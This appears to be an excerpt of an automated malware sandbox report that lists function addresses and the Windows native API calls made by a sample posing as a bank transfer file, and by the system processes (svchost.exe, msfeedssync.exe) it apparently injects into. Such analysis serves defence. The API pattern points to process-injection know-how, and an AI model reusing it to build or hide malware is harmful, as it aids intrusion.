Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352B60 NtClose,LdrInitializeThunk,	6_2_03352B60
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_03352BA0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_03352BF0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_03352BE0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352AF0 NtWriteFile,LdrInitializeThunk,	6_2_03352AF0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352AD0 NtReadFile,LdrInitializeThunk,	6_2_03352AD0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352F30 NtCreateSection,LdrInitializeThunk,	6_2_03352F30
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352FB0 NtResumeThread,LdrInitializeThunk,	6_2_03352FB0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352FE0 NtCreateFile,LdrInitializeThunk,	6_2_03352FE0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_03352E80
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_03352EE0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_03352D30
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_03352D10
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_03352DF0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352DD0 NtDelayExecution,LdrInitializeThunk,	6_2_03352DD0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_03352C70
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352C60 NtCreateKey,LdrInitializeThunk,	6_2_03352C60
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_03352CA0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033535C0 NtCreateMutant,LdrInitializeThunk,	6_2_033535C0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033539B0 NtGetContextThread,LdrInitializeThunk,	6_2_033539B0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352B80 NtQueryInformationFile,	6_2_03352B80
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352AB0 NtWaitForSingleObject,	6_2_03352AB0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352F60 NtCreateProcessEx,	6_2_03352F60
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352FA0 NtQuerySection,	6_2_03352FA0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352F90 NtProtectVirtualMemory,	6_2_03352F90
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352E30 NtWriteVirtualMemory,	6_2_03352E30
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352EA0 NtAdjustPrivilegesToken,	6_2_03352EA0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352D00 NtSetInformationFile,	6_2_03352D00
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352DB0 NtEnumerateKey,	6_2_03352DB0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352C00 NtQueryInformationProcess,	6_2_03352C00
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352CF0 NtOpenProcess,	6_2_03352CF0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03352CC0 NtQueryVirtualMemory,	6_2_03352CC0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03353010 NtOpenDirectoryObject,	6_2_03353010
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03353090 NtSetValueKey,	6_2_03353090
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03353D10 NtOpenProcessToken,	6_2_03353D10
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03353D70 NtOpenThread,	6_2_03353D70
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C29330 NtReadFile,	6_2_02C29330
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C291D0 NtCreateFile,	6_2_02C291D0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C29610 NtAllocateVirtualMemory,	6_2_02C29610
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C294C0 NtClose,	6_2_02C294C0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_02C29420 NtDeleteFile,	6_2_02C29420
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0322F884 NtUnmapViewOfSection,	6_2_0322F884

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_0069A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0069A1EF

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_00688310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00688310

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe

Code function: 0_2_006951BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_006951BD

Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0065D975	0_2_0065D975
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_006521C5	0_2_006521C5
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_006662D2	0_2_006662D2
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_006B03DA	0_2_006B03DA
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0066242E	0_2_0066242E
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_006525FA	0_2_006525FA
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0068E616	0_2_0068E616
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_006466E1	0_2_006466E1
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0063E6A0	0_2_0063E6A0
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0066878F	0_2_0066878F
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00666844	0_2_00666844
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_006B0857	0_2_006B0857
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00648808	0_2_00648808
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00698889	0_2_00698889
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0065CB21	0_2_0065CB21
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00666DB6	0_2_00666DB6
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00646F9E	0_2_00646F9E
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00643030	0_2_00643030
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0065F1D9	0_2_0065F1D9
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00653187	0_2_00653187
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00631287	0_2_00631287
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00651484	0_2_00651484
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00645520	0_2_00645520
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00657696	0_2_00657696
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00645760	0_2_00645760
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00651978	0_2_00651978
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00669AB5	0_2_00669AB5
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0063FCE0	0_2_0063FCE0
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_006B7DDB	0_2_006B7DDB
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0065BDA6	0_2_0065BDA6
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00651D90	0_2_00651D90
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_0063DF00	0_2_0063DF00
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00643FE0	0_2_00643FE0
Source: C:\Users\user\Desktop\Transferencia 6997900002017937.exe	Code function: 0_2_00E54868	0_2_00E54868
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004186C3	1_2_004186C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403000	1_2_00403000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004168C3	1_2_004168C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E0C3	1_2_0040E0C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004100D3	1_2_004100D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004168BE	1_2_004168BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004021DA	1_2_004021DA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004021E0	1_2_004021E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004011A0	1_2_004011A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E25C	1_2_0040E25C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E207	1_2_0040E207
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E213	1_2_0040E213
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042ED53	1_2_0042ED53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402690	1_2_00402690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FEAD	1_2_0040FEAD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FEB3	1_2_0040FEB3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FA352	1_2_037FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038003E6	1_2_038003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E3F0	1_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C02C0	1_2_037C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C8158	1_2_037C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038001AA	1_2_038001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DA118	1_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03730100	1_2_03730100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F81CC	1_2_037F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F41A2	1_2_037F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03764750	1_2_03764750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373C7C0	1_2_0373C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375C6E0	1_2_0375C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03800591	1_2_03800591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740535	1_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F2446	1_2_037F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E4420	1_2_037E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EE4F6	1_2_037EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FAB40	1_2_037FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F6BD7	1_2_037F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03756962	1_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0380A9A6	1_2_0380A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374A840	1_2_0374A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03742840	1_2_03742840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E8F0	1_2_0376E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037268B8	1_2_037268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B4F40	1_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03760F30	1_2_03760F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E2F30	1_2_037E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03782F28	1_2_03782F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374CFE0	1_2_0374CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03732FC8	1_2_03732FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BEFA0	1_2_037BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740E59	1_2_03740E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FEE26	1_2_037FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FEEDB	1_2_037FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03752E90	1_2_03752E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FCE93	1_2_037FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DCD1F	1_2_037DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374AD00	1_2_0374AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373ADE0	1_2_0373ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03758DBF	1_2_03758DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740C00	1_2_03740C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03730CF2	1_2_03730CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0CB5	1_2_037E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372D34C	1_2_0372D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F132D	1_2_037F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0378739A	1_2_0378739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E12ED	1_2_037E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375B2C0	1_2_0375B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037452A0	1_2_037452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372F172	1_2_0372F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0377516C	1_2_0377516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374B1B0	1_2_0374B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0380B16B	1_2_0380B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F70E9	1_2_037F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FF0E0	1_2_037FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EF0CC	1_2_037EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037470C0	1_2_037470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FF7B0	1_2_037FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03785630	1_2_03785630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F16CC	1_2_037F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F7571	1_2_037F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038095C3	1_2_038095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DD5B0	1_2_037DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03731460	1_2_03731460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FF43F	1_2_037FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FFB76	1_2_037FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B5BF0	1_2_037B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0377DBF9	1_2_0377DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375FB80	1_2_0375FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B3A6C	1_2_037B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FFA49	1_2_037FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F7A46	1_2_037F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EDAC6	1_2_037EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DDAAC	1_2_037DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03785AA0	1_2_03785AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E1AA3	1_2_037E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03749950	1_2_03749950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375B950	1_2_0375B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D5910	1_2_037D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AD800	1_2_037AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037438E0	1_2_037438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FFF09	1_2_037FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03703FD2	1_2_03703FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03703FD5	1_2_03703FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FFFB1	1_2_037FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03741F92	1_2_03741F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03749EB0	1_2_03749EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F7D73	1_2_037F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F1D5A	1_2_037F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03743D40	1_2_03743D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375FDC0	1_2_0375FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B9C32	1_2_037B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FFCF2	1_2_037FFCF2
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033DA352	6_2_033DA352
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0332E3F0	6_2_0332E3F0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033E03E6	6_2_033E03E6
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033C0274	6_2_033C0274
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033A02C0	6_2_033A02C0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033BA118	6_2_033BA118
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03310100	6_2_03310100
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033A8158	6_2_033A8158
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033E01AA	6_2_033E01AA
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033D41A2	6_2_033D41A2
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033D81CC	6_2_033D81CC
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033B2000	6_2_033B2000
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03320770	6_2_03320770
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03344750	6_2_03344750
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0331C7C0	6_2_0331C7C0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0333C6E0	6_2_0333C6E0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03320535	6_2_03320535
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033E0591	6_2_033E0591
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033C4420	6_2_033C4420
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033D2446	6_2_033D2446
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033CE4F6	6_2_033CE4F6
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033DAB40	6_2_033DAB40
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033D6BD7	6_2_033D6BD7
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0331EA80	6_2_0331EA80
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03336962	6_2_03336962
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033229A0	6_2_033229A0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033EA9A6	6_2_033EA9A6
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03322840	6_2_03322840
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0332A840	6_2_0332A840
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033068B8	6_2_033068B8
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0334E8F0	6_2_0334E8F0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03340F30	6_2_03340F30
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033C2F30	6_2_033C2F30
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03362F28	6_2_03362F28
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03394F40	6_2_03394F40
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0339EFA0	6_2_0339EFA0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0332CFE0	6_2_0332CFE0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03312FC8	6_2_03312FC8
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033DEE26	6_2_033DEE26
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03320E59	6_2_03320E59
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03332E90	6_2_03332E90
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033DCE93	6_2_033DCE93
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033DEEDB	6_2_033DEEDB
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033BCD1F	6_2_033BCD1F
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0332AD00	6_2_0332AD00
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03338DBF	6_2_03338DBF
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0331ADE0	6_2_0331ADE0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03320C00	6_2_03320C00
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033C0CB5	6_2_033C0CB5
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03310CF2	6_2_03310CF2
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033D132D	6_2_033D132D
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0330D34C	6_2_0330D34C
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0336739A	6_2_0336739A
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033252A0	6_2_033252A0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033C12ED	6_2_033C12ED
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0333B2C0	6_2_0333B2C0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0330F172	6_2_0330F172
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033EB16B	6_2_033EB16B
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0335516C	6_2_0335516C
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0332B1B0	6_2_0332B1B0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033D70E9	6_2_033D70E9
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033DF0E0	6_2_033DF0E0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033CF0CC	6_2_033CF0CC
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033270C0	6_2_033270C0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033DF7B0	6_2_033DF7B0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03365630	6_2_03365630
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033D16CC	6_2_033D16CC
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033D7571	6_2_033D7571
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033BD5B0	6_2_033BD5B0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033E95C3	6_2_033E95C3
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033DF43F	6_2_033DF43F
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03311460	6_2_03311460
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033DFB76	6_2_033DFB76
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0333FB80	6_2_0333FB80
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03395BF0	6_2_03395BF0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_0335DBF9	6_2_0335DBF9
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03393A6C	6_2_03393A6C
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033DFA49	6_2_033DFA49
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033D7A46	6_2_033D7A46
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_03365AA0	6_2_03365AA0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 6_2_033BDAAC	6_2_033BDAAC
